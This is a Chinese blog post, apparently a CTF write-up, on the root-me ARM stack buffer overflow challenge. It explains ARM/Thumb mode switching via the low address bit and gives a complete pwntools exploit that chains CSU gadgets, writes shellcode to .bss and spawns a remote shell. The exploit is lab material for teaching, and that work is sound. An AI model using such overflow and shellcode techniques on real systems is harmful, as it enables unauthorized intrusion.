(ARM PWN里的thumb模式和arm模式的切换)root_me_stack_buffer_overflow_basic

最新推荐文章于 2021-10-10 13:09:06 发布
最新推荐文章于 2021-10-10 13:09:06 发布
阅读量528 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107566892
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

(ARM PWN里的thumb模式和arm模式的切换)root_me_stack_buffer_overflow_basic

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,栈溢出漏洞

在CSU里面有可以利用的gadget,但是直接ret过去,会报invalid instrument错误。

这是由于在csu这里的指令是thumb指令,需要将cpu工作状态转移到thumb指令状态才可以执行。标记ARM状态是用CPSR寄存器中的标志位T,

BX指令可以设置T位,当BX后面的地址值最后一个bit为1时,则将T置位,cpu工作在thumb模式,如果bit为0,则为arm模式。同理,直接ret也具有这个特性,因此,只需要在确保目的地址值的最后一个bit为1,既可以切换到thumb模式,来执行csu的gadget。

#coding:utf8
from pwn import *

context(os='linux',arch='arm')

elf = ELF('./root_me_stack_buffer_overflow_basic')
scanf_got = elf.got['scanf']
bss = 0x00021008 + 0x100
csu_pop = 0x00010610
csu_call = 0x000105FE
#sh = process(argv=['qemu-arm','-L','/home/sea/arm_pwn/arm-libs','./root_me_stack_buffer_overflow_basic'])
#sh = process(argv=['qemu-arm','-g','1234','-L','/home/sea/arm_pwn/arm-libs','./root_me_stack_buffer_overflow_basic'])

sh = remote('node3.buuoj.cn',29902)
payload = 'a'*0xA4 + p32(csu_pop + 1) #切换到Thumb模式,bit0 = 1
payload += p32(0) #R5
payload += p32(0) #R4
payload += p32(scanf_got) #R5
payload += p32(1) #R6
payload += p32(0x00010644) #R7
payload += p32(bss) #R8
payload += p32(0) #R9
payload += p32(csu_call + 1) #Thumb模式,bit0 = 1

payload += p32(0)*0x7
payload += p32(bss) #执行shellcode

sh.sendlineafter('dump:',payload)
sh.sendlineafter('Dump again (y/n):','n')
sh.sendline(asm(shellcraft.sh()))

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
root_me_stack_buffer_overflow_basic
doudoudedi
08-10 466
ARM pwn简单的栈溢出,就是环境搭建的问题 调试出偏移0xa4,发现啥保护没有开,还泄漏了栈地址,就直接ret2shellcode了 from pwn import * #p=process(qemu-arm -g 1234 -L /usr/arm-linux-gnueabihf/ ./root_me_stack_buffer_overflow_basiac"]) p=remote("node3.buuoj.cn",27876) p.sendlineafter('Give me data to dump
ThumbARM指令 状态切换
jamestaosh
07-13 1万+
  与ARM指令集相比较,Thumb指令集中的数据处理指令的操作数仍然是32位,指令地址也为32位,但Thumb指令集为实现16位的指令长度,舍弃了ARM指令集的一些特性,如大多数的Thumb指令是无条件执行的,而几乎所有的ARM指令都是有条件执行的;大多数的Thumb数据处理指令的目的寄存器与其中一个源寄存器相同。  由于Thumb指令的长度为16位,即只用A
armthumb指令模式
Android系统攻城狮
04-08 1687
目录:frameworks/native/opengl/libagl文件:Androi.mk light.cpp默认情况下,arm目标二进制会以thumb的形式生成(16位),你可以通过设置这个变量为arm如果你希望你的module是以32位指令的形式。arm:32位指令模式thumb: 16位指令模式(thumb指令不如arm指令效率高)在编译的时候告诉系统编译特定的类型:LOCAL_ARM_M...
ARM状态和THUMB状态
weixin_49456098的博客
10-10 3473
ARM状态和THUMB状态 在ARM的体系结构中,可以工作在三种不同的状态, 一是ARM状态 此时处理器执行32位的字对齐的ARM指令 arm处理器工作于32位指令的状态,所有指令均为32位 二是Thumb状态 此时处理器执行16位的,半字对齐的THUMB指令。 arm执行16位指令的状态,即16位状态 Thumb-2状态是ARM7版本的ARM处理器所具有的新的状态,新的thumb-2内核技术兼有16位及32位指令,实现了更高的性能,更有效的功耗及更少地占用内存。总的来说,感觉这个状态除了
arm armcm33 pack包_【系列分享】ARM 汇编基础速成3:ARM模式THUMB模式
weixin_42217306的博客
01-14 452
预估稿费:190RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿传送门ARM处理器有两个主要的操作状态,ARM模式以及Thumb模式(Jazelle模式先不考虑)。这些模式与特权模式并不冲突。SVC模式既可以在ARM下调用也可以在Thumb下调用。只不过两种状态的主要不同是指令集的不同,ARM模式的指令集宽度是32位而Thumb是16位宽度(但也可以是32位)。知道何时以...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
学习和理解这些代码,可以帮助开发者深入掌握ARM7处理器上的PWM接口实现,以及如何在汇编和C语言之间切换以优化性能。此外,对于硬件驱动开发、嵌入式系统设计以及实时操作系统(RTOS)的调度等方面都有重要的参考价值...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
5. **综合和仿真**:编写完成后,通过EDA工具对Verilog代码进行综合(将高级描述转化为门级电路)和仿真(验证设计功能),确保其正确无误。 通过以上步骤,我们就可以用Verilog HDL实现一个基本的PWM控制器。在...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
最新发布
09-24
在C语言编程中,我们需要配置单片机的定时器工作模式,比如选择PWM模式,并设定预分频器和比较值。当定时器溢出或达到比较值时,会触发中断服务函数,更新输出引脚的状态,形成PWM波形。此外,我们还可以通过改变...
CTF-rootme 题解之ELF x86 - Stack buffer overflow basic 1
weixin_30456039的博客
03-17 812
LINK:https://www.root-me.org/en/Challenges/App-System/ELF32-Stack-buffer-overflow-basic-1 Reference:n3k0sec.top/2018/10/11/root-me-app-system/ SouceCode: #include <stdlib.h> #inclu...
Arm的几种工作模式和工作状态
热门推荐
beyond702的专栏
11-18 2万+
转载地址:http://blog.chinaunix.net/uid-28458801-id-3494646.html ARM处理器工作模式一共有 7 种 : USR  模式     正常用户模式,程序正常执行模式 FIQ模式(Fast Interrupt Request)      处理快速中断,支持高速数据传送或通道处理 IRQ模式      处理普通
ARMThumb之间的状态转换
Linux Openharmony Android Graphics Stack!
11-27 1万+
由于Thumb指令在某些特殊情况下可能比ARM指令更有效,所以它在很多方面得到了广泛的应用。但是Thumb知识ARM指令集的一个子集,它不能独立组成一个应用系统,所以在很多情况下应用程序需要二者的混合编程,这就必然存在ARMThumb状态之间函数调用的问题。下面将分别详细介绍。1)      状态切换的实现ARM/Thumb之间的状态切换是通过一条专用的转移交换指令BX来实现的。BX指令以通用寄
ARM指令如何在thumbarm模式切换
cfy_phonex的专栏
01-22 1万+
根据arm spec, 跳转地址最低位( lsb ) 为0表示 arm 指令;最低位为1表示thumb指令。 一、绝对地址跳转进入 thumb模式 如下指令可以切换thumb模式。 LDR R6, =0x24000 ADD R6, #1 @ (set lsb to 1) BX R6 如果已经知道 0x24000 地址存放的是 thumb 指令, 可以直
ARM系列】Thumb状态分析以及ARMThumb之间的状态转换
CSDN明星博主,认证博客专家,视频、Matlab领域优质创作者。
08-07 2888
DATE: 2019-8-7【Tags: ARM汇编优化系列】 1、参考 2、Thumb状态分析 3、ARMThumb之间的状态转换 4、ThumbARM指令的主要区别
ARM指令状态切换Thumb指令状态
u011449588的专栏
03-26 1万+
AREA Arm_to_Thumb,CODE, READONLY ENTRY CODE32 start ldr r0,=aaa+1 mov r3,#18 bx r0 CODE16 aaa  mov r1,#12 mov r2,#10 END 请看上面的代码,首先看到第一条指令,ldr r0,=aaa+1,aaa可以理解成一个函数的名字,那么函数aaa执行的时候是不
CTF-rootme 题解之ELF - 0 protection && ELF - x86 Basic
weixin_30740295的博客
02-26 488
题目入口: https://www.root-me.org/en/Challenges/Cracking/ELF-0-protection https://www.root-me.org/en/Challenges/Cracking/ELF-x86-Basic crack-bin: http://challenge01.root-me.org/cracking/ch1/ch1.zip h...
一步一步学ROP之Android ARM 32位篇 -- 阅读笔记及实践
andy7002的博客
06-08 1895
0x00 前言   本文是蒸米的《一步一步学ROP之Android ARM 32位篇》读书笔记,自己动手做了一遍,记录了遇到不一样的地方和问题,4个程序全部运行成功。 0x01 简单的例子(level6) #include #include #include void callsystem() { system("/system/bin/sh"); } void vu
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow漏洞利用,主要集中在如何通过精心构造payload来控制程序的执行流,尤其是针对ARM架构的程序。 首先,提到的"publicvuln...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值